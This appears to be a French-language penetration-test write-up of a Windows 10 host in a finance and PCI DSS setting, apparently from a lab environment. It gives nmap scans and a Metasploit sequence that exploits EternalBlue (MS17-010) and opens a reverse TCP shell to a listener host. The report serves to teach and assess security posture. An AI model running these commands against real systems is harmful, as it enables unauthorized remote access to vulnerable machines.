
Ce rapport décrit un engagement VAPT structuré axé sur la conformité PCI DSS, l'énumération des services SMB et l'exploitation de CVE-2017-0144 (EternalBlue) sur une machine Windows 10 au sein d'une infrastructure orientée finance.
Les institutions financières sont confrontées à certaines des exigences de conformité les plus strictes dans le domaine de la cybersécurité. Avec des données clients sensibles et des informations de titulaires de carte en jeu, des erreurs de configuration de sécurité peuvent entraîner des violations catastrophiques. Cette simulation VAPT a été réalisée pour évaluer la posture de sécurité d'un système d'extrémité basé sur Windows 10 du point de vue de la conformité PCI DSS, tout en identifiant et en exploitant les vulnérabilités connues dans les services SMB exposés.
La simulation couvre plusieurs étapes, de la reconnaissance et du scan de vulnérabilités à l'aide de Nessus à l'exploitation réelle via Metasploit. Le rapport souligne en outre l'importance du durcissement des points de terminaison, de la gestion des correctifs, de l'application des pare-feu et de l'alignement PCI DSS pour maintenir l'intégrité des réseaux financiers.
Préparé par : Aditya Bhatt
Fonction : Analyste VAPT | Professionnel en cybersécurité
Contact : [email protected] | +91-9818993884
Ce rapport présente les résultats d'un test d'intrusion mené sur un point de terminaison Windows 10 soupçonné de traiter des données financières et des transactions par carte de crédit. L'objectif était de valider les implémentations de contrôles PCI DSS et d'identifier les vecteurs d'attaque potentiels qui pourraient compromettre les données des titulaires de carte.
À l'aide de Nessus, l'hôte s'est avéré vulnérable à CVE-2017-0144 (EternalBlue) — une vulnérabilité SMB critique. Le framework Metasploit a ensuite été utilisé pour exploiter cette faille et obtenir un accès shell distant non autorisé. Ce rapport souligne l'importance d'une gestion rapide des correctifs et du durcissement des services réseau pour éviter les violations de données dans les systèmes financiers.
Six objectifs principaux et douze exigences du PCI DSS ont été examinés. Les principes clés incluent :
Système cible :
10.10.195.105255.0.0.0Outils utilisés :
Commandes clés :
nmap -sn 10.10.195.105
nmap -sV -p445 10.10.195.105
nmap -F 10.10.195.105
Scanneur :
Tentative de scan Nessus :
Tentative de scan Metasploit :
use scanner/smb/smb_ms17_010
set RHOSTS 10.10.195.105
run
Module d'exploitation :
use exploit/windows/smb/ms17_010_eternalblue
set payload generic/shell_reverse_tcp
set RHOSTS 10.10.195.105
set LHOST 10.17.88.138
exploit
Gestion des correctifs
Durcissement réseau
Application des pare-feu
Surveillance continue
Conformité PCI DSS
Formation de sensibilisation
Cet engagement a clairement démontré que des services non corrigés et obsolètes comme SMBv1 peuvent conduire à une compromission complète du système à l'aide d'exploits connus publiquement. La vulnérabilité EternalBlue exploitée ici est un exemple classique de pourquoi une mise à jour rapide, une minimisation des services et un scan proactif sont non négociables dans les infrastructures financières.
Sans conformité à des cadres comme le PCI DSS, les organisations risquent à la fois des sanctions légales et des violations de données dévastatrices.
Les lacunes de sécurité se cachent souvent derrière des protocoles obsolètes et des correctifs oubliés. Cet engagement a réaffirmé la criticité de traiter chaque service, en particulier ceux comme SMB, non pas comme une commodité, mais comme une surface de risque.
Une cybersécurité solide dans le secteur financier commence par une vigilance continue, des politiques appliquées et une gestion des correctifs sans compromis.
Merci d'avoir lu ce rapport. J'espère qu'il a apporté de la clarté, des perspectives pratiques et un renforcement de pourquoi la validation continue de la sécurité est essentielle, en particulier lors du traitement de données financières.
– Aditya Bhatt
Analyste VAPT | Professionnel en cybersécurité
| Description du risque | Impact | Probabilité | Score de risque |
|---|
| Exploitation d'EternalBlue (SMBv1) | Élevé | Élevée | Critique |
| Absence de gestion des correctifs | Élevé | Moyenne | Élevé |
| Absence de contrôles d'accès réseau | Moyen | Élevée | Élevé |
| Non-conformité au PCI DSS | Élevé | Élevée | Critique |